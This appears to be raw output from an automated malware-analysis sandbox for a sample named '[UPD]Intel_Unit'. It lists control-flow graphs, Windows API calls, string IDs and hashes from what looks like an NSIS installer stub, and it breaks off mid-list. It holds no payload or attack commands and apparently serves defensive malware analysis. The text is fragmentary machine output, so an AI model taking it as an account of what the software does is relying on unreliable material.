5167 404276 GetDlgItem 5166->5167 5168 40433e 5166->5168 5170 404290 5167->5170 5171 4042ff 5167->5171 5174 403dca 8 API calls 5168->5174 5176 403d3f 19 API calls 5169->5176 5170->5171 5179 4042b6 6 API calls 5170->5179 5171->5168 5180 404311 5171->5180 5173->5166 5173->5168 5175 40423b GetDlgItem SendMessageW 5173->5175 5178 404339 5174->5178 5200 403d85 KiUserCallbackDispatcher 5175->5200 5177 40414e 5176->5177 5182 403d3f 19 API calls 5177->5182 5179->5171 5183 404327 5180->5183 5184 404317 SendMessageW 5180->5184 5187 40415b CheckDlgButton 5182->5187 5183->5178 5188 40432d SendMessageW 5183->5188 5184->5183 5185 404267 5186 403d61 SendMessageW 5185->5186 5186->5166 5198 403d85 KiUserCallbackDispatcher 5187->5198 5188->5178 5190 404179 GetDlgItem 5199 403d98 SendMessageW 5190->5199 5192 40418f SendMessageW 5193 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5192->5193 5194 4041ac GetSysColor 5192->5194 5193->5178 5194->5193 5196 404007 5195->5196 5197 403fe9 GlobalAlloc WideCharToMultiByte 5195->5197 5196->5169 5197->5196 5198->5190 5199->5192 5200->5185 4195 401eb9 4196 401f24 4195->4196 4197 401ec6 4195->4197 4198 401f53 GlobalAlloc 4196->4198 4199 401f28 4196->4199 4200 401ed5 4197->4200 4207 401ef7 4197->4207 4201 406805 18 API calls 4198->4201 4206 4062a3 11 API calls 4199->4206 4211 401f36 4199->4211 4202 4062a3 11 API calls 4200->4202 4205 401f46 4201->4205 4203 401ee2 4202->4203 4208 402708 4203->4208 4213 406805 18 API calls 4203->4213 4205->4208 4209 402387 GlobalFree 4205->4209 4206->4211 4217 406009 lstrcpynW 4207->4217 4209->4208 4219 406009 lstrcpynW 4211->4219 4212 401f06 4218 406009 lstrcpynW 4212->4218 4213->4203 4215 401f15 4220 406009 lstrcpynW 4215->4220 4217->4212 4218->4215 4219->4205 4220->4208 5201 4074bb 5203 407344 5201->5203 5202 407c6d 5203->5202 5204 4073c2 GlobalFree 5203->5204 5205 4073cb GlobalAlloc 5203->5205 5206 407443 GlobalAlloc 5203->5206 5207 40743a GlobalFree 5203->5207 5204->5205 5205->5202 5205->5203 5206->5202 5206->5203 5207->5206

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00405196
                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                                                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                                                                                                                                                                • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                                                                                                                                • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 004052E7
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                                                                                                                                                              • ShowWindow.USER32(00000008), ref: 00405333
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 00405376
                                                                                                                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                                                                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                                                                                                                                                              • EmptyClipboard.USER32 ref: 00405411
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                                                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 0040546E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                              • String ID: @rD$New install of "%s" to "%s"${
                                                                                                                                                                                                              • API String ID: 2110491804-2409696222
                                                                                                                                                                                                              • Opcode ID: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
                                                                                                                                                                                                              • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • #17.COMCTL32 ref: 004038A2
                                                                                                                                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                                                                                                                                                                • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                                                • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                                                • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                                              • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                                                                                                                                                                • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                              • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                                                                                                                                                              • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                                                                                                                                                              • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00403AF1
                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                                                                                                                                                              • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                                                                                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                              • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                                                                                                                                                              • API String ID: 2435955865-239407132
                                                                                                                                                                                                              • Opcode ID: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
                                                                                                                                                                                                              • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 587 406805-406810 588 406812-406821 587->588 589 406823-406837 587->589 588->589 590 406839-406846 589->590 591 40684f-406855 589->591 590->591 594 406848-40684b 590->594 592 406a81-406a8a 591->592 593 40685b-40685c 591->593 596 406a95-406a96 592->596 597 406a8c-406a90 call 406009 592->597 595 40685d-40686a 593->595 594->591 598 406870-406880 595->598 599 406a7f-406a80 595->599 597->596 601 406886-406889 598->601 602 406a5a 598->602 599->592 603 406a5d 601->603 604 40688f-4068cd 601->604 602->603 605 406a6d-406a70 603->605 606 406a5f-406a6b 603->606 607 4068d3-4068de GetVersion 604->607 608 4069ed-4069f6 604->608 611 406a73-406a79 605->611 606->611 612 4068e0-4068e8 607->612 613 4068fc 607->613 609 4069f8-4069fb 608->609 610 406a2f-406a38 608->610 616 406a0b-406a1a call 406009 609->616 617 4069fd-406a09 call 405f51 609->617 614 406a46-406a58 lstrlenW 610->614 615 406a3a-406a41 call 406805 610->615 611->595 611->599 612->613 618 4068ea-4068ee 612->618 619 406903-40690a 613->619 614->611 615->614 628 406a1f-406a25 616->628 617->628 618->613 622 4068f0-4068f4 618->622 624 40690c-40690e 619->624 625 40690f-406911 619->625 622->613 627 4068f6-4068fa 622->627 624->625 629 406913-406939 call 405ed3 625->629 630 40694d-406950 625->630 627->619 628->614 634 406a27-406a2d call 406038 628->634 640 4069d9-4069dd 629->640 641 40693f-406948 call 406805 629->641 632 406960-406963 630->632 633 406952-40695e GetSystemDirectoryW 630->633 637 406965-406973 GetWindowsDirectoryW 632->637 638 4069cf-4069d1 632->638 636 4069d3-4069d7 633->636 634->614 636->634 636->640 637->638 638->636 642 406975-40697f 638->642 640->634 645 4069df-4069eb lstrcatW 640->645 641->636 646 406981-406984 642->646 647 406999-4069af SHGetSpecialFolderLocation 642->647 645->634 646->647 649 406986-40698d 646->649 650 4069b1-4069c8 SHGetPathFromIDListW CoTaskMemFree 647->650 651 4069ca-4069cc 647->651 652 406995-406997 649->652 650->636 650->651 651->638 652->636 652->647
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                                                                                                                                                                • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                                                                                                                                                              • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                                                                                                                                                              • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                              • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                              • API String ID: 3581403547-784952888
                                                                                                                                                                                                              • Opcode ID: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
                                                                                                                                                                                                              • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                                                                                                                              • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 310444273-0
                                                                                                                                                                                                              • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                                                                                                                              • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
